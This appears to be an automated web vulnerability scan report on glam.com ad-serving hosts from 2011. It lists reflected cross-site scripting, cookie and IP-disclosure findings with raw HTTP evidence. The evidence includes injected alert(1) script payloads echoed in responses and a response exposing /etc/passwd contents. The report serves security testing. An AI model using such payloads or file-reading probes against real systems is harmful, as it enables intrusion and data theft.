3. Cross-site scripting (reflected)
3.1. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]
3.2. http://www24a.glam.com/appdir/getscript.jsp [view parameter]
3.3. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]
3.5. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]
3.6. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]
3.7. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]
3.8. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]
4. Cookie scoped to parent domain
5. Cross-domain Referer leakage
6. Cookie without HttpOnly flag set
7. Private IP addresses disclosed
7.1. http://www35.glam.com/gad/glamadapt_jsrv.act
7.2. http://www35.glam.com/gad/glamadapt_jsrv.act
7.3. http://www35.glam.com/gad/glamadapt_jsrv.act
7.4. http://www35.glam.com/gad/glamadapt_jsrv.act
7.5. http://www35.glam.com/gad/glamadapt_jsrv.act
7.6. http://www35.glam.com/gad/glamadapt_jsrv.act
7.7. http://www35.glam.com/gad/glamadapt_jsrv.act
7.8. http://www35.glam.com/gad/glamadapt_jsrv.act
7.9. http://www35.glam.com/gad/glamadapt_jsrv.act
8. Credit card numbers disclosed
9. Content type incorrectly stated
Severity: | High |
Confidence: | Firm |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=3600 Date: Mon, 13 Jun 2011 11:09:34 GMT Content-Length: 2011 Connection: close root:x:0:0:root:/root:/bin bin:x:1:1:bin:/bin:/sbin daemon:x:2:2:daemon:/sbin adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdow ...[SNIP]... ucp:/sbin/nologin operator:x:11:0:operator: games:x:12:100:games:/usr gopher:x:13:30:gopher: ftp:x:14:50:FTP User:/var/ftp:/sbin nobody:x:99:99:Nobody:/:/sbin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin distcache:x:94:94 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www22.glam.com |
Path: | /cTagsImgCmd.act |
GET /cTagsImgCmd.act?gtid Host: www22.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 302 Moved Temporarily Server: Apache Content-Length: 153 Content-Type: text/html Location: http://www35t.glam.com Set-Cookie: bc557 14ab2681ee8=D,T,5150,3726,2951,2705 ETag: "662c9bddfc82c61ba80 P3P: policyref="http://www Cache-Control: max-age=144 Date: Mon, 13 Jun 2011 11:02:54 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (302 Moved Temporarily) has occured in response to this request. </BODY> </HTML> |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 13 Jun 2011 11:02:08 GMT Content-Length: 60046 Connection: close // <!-- [gnetGeneratedTime]=[Fri Mar 25 2011 12:14:16 PDT] --> // <!-- [gnetCachedTime]=[Mon Jun 13 2011 4:02:08 PDT] --> window.glam_session = new Object(); window.glam_session ...[SNIP]... segs&gvalue=!qcsegs" height="0" width="0" border="0">'); function GlamProcessScriptParams() { } window.glam_affiliate_id = '1000212071'; window.glam_zone = ''; window.glam_ad_size = '300x250904da';alert(1)/ window.glam_status = ''; window.glam_status = (window.glam_status=='' /* */ function GlamShowCustomDefaultAd window.glam_affiliate ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www24a.glam.com |
Path: | /appdir/getscript.jsp |
GET /appdir/getscript.jsp Host: www24a.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Content-Type: text/javascript; charset=ISO-8859-1 Server: Jetty(6.1.21) Vary: Accept-Encoding Date: Mon, 13 Jun 2011 11:02:19 GMT Content-Length: 67410 Connection: close window.glamMetricsData = 'pubId=' + encodeURIComponent(window + '&pv=' + encodeURIComponent(window ...[SNIP]... .gsUrl = "http://www24a.glam.com gadget.mid = "73410477362939"; gadget.isConfig = ""; gadget.developerId = 363645764; gadget.publisherId = 104510405; gadget.view = "profiled7e21<script>alert(1)< gadget.hashData = glamMetricsData; // XXX not safe gadget.hasInline = '1'; gadget.inlineContent = '<script type=\'text/javascript\' > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000045035 X-Glam-Euid: fd547b017683849502d2 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:02:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:02:10 GMT Content-Length: 3261 Connection: close ...[SNIP]... ,f0f02sa,g10001s;sz var vars = glam_affiliate_vars.split for (var i=0;i<vars.length;i++) { var pair = vars[i].split("="); if ( pair[1] ) { glam_info[pair[0]] = pair[1]; } } return ( glam_info[pName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000045035 X-Glam-Euid: 5a74f4a2e4f82ff2cf7c X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:02:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:02:19 GMT Content-Length: 3378 Connection: close ...[SNIP]... f0f02sa,g10001s;sz var vars = glam_affiliate_vars.split for (var i=0;i<vars.length;i++) { var pair = vars[i].split("="); if ( pair[1] ) { glam_info[pair[0]] = pair[1]; } } return ( glam_info[pNa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 13 Jun 2011 11:02:09 GMT Content-Length: 60048 Connection: close // <!-- [gnetGeneratedTime]=[Fri Mar 25 2011 12:14:16 PDT] --> // <!-- [gnetCachedTime]=[Mon Jun 13 2011 3:55:41 PDT] --> window.glam_session = new Object(); window.glam_session /* */ window.glam_session.edge = true; window.glam_session.glam window.glam_session.ctags window.glam_session window.glam_session.dma= window.glam_session window.glam_session.sid window.glam_session.user docu ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 13 Jun 2011 11:02:09 GMT Content-Length: 60048 Connection: close // <!-- [gnetGeneratedTime]=[Fri Mar 25 2011 12:14:16 PDT] --> // <!-- [gnetCachedTime]=[Mon Jun 13 2011 3:55:41 PDT] --> window.glam_session = new Object(); window.glam_session /* */ window.glam_session.edge = true; window.glam_session.glam window.glam_session.ctags window.glam_session window.glam_session.dma= window.glam_session window.glam_session.sid ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 13 Jun 2011 11:03:05 GMT Content-Length: 59854 Connection: close // <!-- [gnetGeneratedTime]=[Fri Mar 25 2011 12:14:16 PDT] --> // <!-- [gnetCachedTime]=[Mon Jun 13 2011 3:55:42 PDT] --> window.glam_session = new Object(); window.glam_session ...[SNIP]... e = true; window.glam_session.glam window.glam_session.ctags window.glam_session window.glam_session window.glam_session.dma= window.glam_session window.glam_session.sid window.glam_session.user fu ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000042623 X-Glam-Euid: 3b525c615fbe6201c14f X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:02:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:02:12 GMT Content-Length: 3800 Connection: close ...[SNIP]... teInfo ) { window.GlamGetAffili var glam_info = new Object(); var glam_affiliate_vars = 'js_mode=show;_ge_=3^2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www22.glam.com |
Path: | /cTagsImgCmd.act |
GET /cTagsImgCmd.act?gtid Host: www22.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 302 Moved Temporarily Server: Apache Content-Length: 153 Content-Type: text/html Location: http://www35t.glam.com Set-Cookie: qcsegs=D,T,5150,3726,2951 ETag: "662c9bddfc82c61ba80 P3P: policyref="http://www Cache-Control: max-age=897 Date: Mon, 13 Jun 2011 11:02:51 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (302 Moved Temporarily) has occured in response to this request. </BODY> </HTML> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 13 Jun 2011 11:02:02 GMT Content-Length: 60018 Connection: close // <!-- [gnetGeneratedTime]=[Fri Mar 25 2011 12:14:16 PDT] --> // <!-- [gnetCachedTime]=[Mon Jun 13 2011 3:55:41 PDT] --> window.glam_session = new Object(); window.glam_session ...[SNIP]... lam_session.country_code= window.glam_session.dma= window.glam_session window.glam_session.sid window.glam_session.user document.write('<img style="display:none;" src="http://pixel function GlamProcessScriptParams() { } window.glam_affiliate_id = '1000212071'; window.glam_zone = ''; window.glam_ad_size = '300x250'; window.glam_status = ''; window.glam_status = (w ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www22.glam.com |
Path: | /cTagsImgCmd.act |
GET /cTagsImgCmd.act?gtid Host: www22.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 302 Moved Temporarily Server: Apache Content-Length: 153 Content-Type: text/html Location: http://www35t.glam.com Set-Cookie: qcsegs=D,T,5150,3726,2951 ETag: "662c9bddfc82c61ba80 P3P: policyref="http://www Cache-Control: max-age=897 Date: Mon, 13 Jun 2011 11:02:51 GMT Connection: close Vary: Accept-Encoding <HTML> <HEAD> <TITLE>Error Page</TITLE> </HEAD> <BODY> An error (302 Moved Temporarily) has occured in response to this request. </BODY> </HTML> |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://fansided.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000036879 X-Glam-Euid: 701ae041616bed1e5328 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:14:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:14:18 GMT Content-Length: 5187 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp63/172.30.0.68] for [www30a2.glam.com] at [Mon Jun 13 2011 4:14:18 PDT] */ document.write('<!-- 888x11 Default --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/z-the User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000044847 X-Glam-Euid: 72ae7c970a4e7f718295 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:13:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:13:55 GMT Content-Length: 3388 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp52/172.30.0.57] for [www30a2.glam.com] at [Mon Jun 13 2011 4:13:55 PDT] */ document.write('<SCRIPT language=\'JavaScript1.1\ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000042623 X-Glam-Euid: a298fe713aedd0d6f764 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:02:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:02:03 GMT Content-Length: 3710 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp38/172.30.0.43] for [www30a2.glam.com] at [Mon Jun 13 2011 4:02:03 PDT] */ document.write(' <img src=\"http://amch ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000036879 X-Glam-Euid: 09bdd73895bd38039187 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:13:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:13:14 GMT Content-Length: 5753 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp105/172.30.0.110] for [www30a2.glam.com] at [Mon Jun 13 2011 4:13:14 PDT] */ var glam_urldata_set='http:/ encodeURIComponent(window ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000042624 X-Glam-Euid: adf7d753c2cad14637ca X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:03:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:03:12 GMT Content-Length: 3567 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp61/172.30.0.66] for [www30a2.glam.com] at [Mon Jun 13 2011 4:03:12 PDT] */ document.write('<script type=\"text/javascript\" src=\"http://altfarm ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000033376 X-Glam-Euid: e8987e6404708b1b0e8f X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:10:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:10:01 GMT Content-Length: 7369 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp104/172.30.0.109] for [www30a2.glam.com] at [Mon Jun 13 2011 4:10:01 PDT] */ document.write('<!-- 888x11 Default --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000045036 X-Glam-Euid: efd00282fdbdb1167c2f X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:19:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:19:10 GMT Content-Length: 3208 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp57/172.30.0.62] for [www30a2.glam.com] at [Mon Jun 13 2011 4:19:10 PDT] */ document.write('<div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000042624 X-Glam-Euid: 7d90fa6f3101c8fade5f X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:13:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:13:24 GMT Content-Length: 3571 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp122/172.30.0.162] for [www30a2.glam.com] at [Mon Jun 13 2011 4:13:24 PDT] */ document.write('<script type=\"text/javascript\" src=\"http://altfarm ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
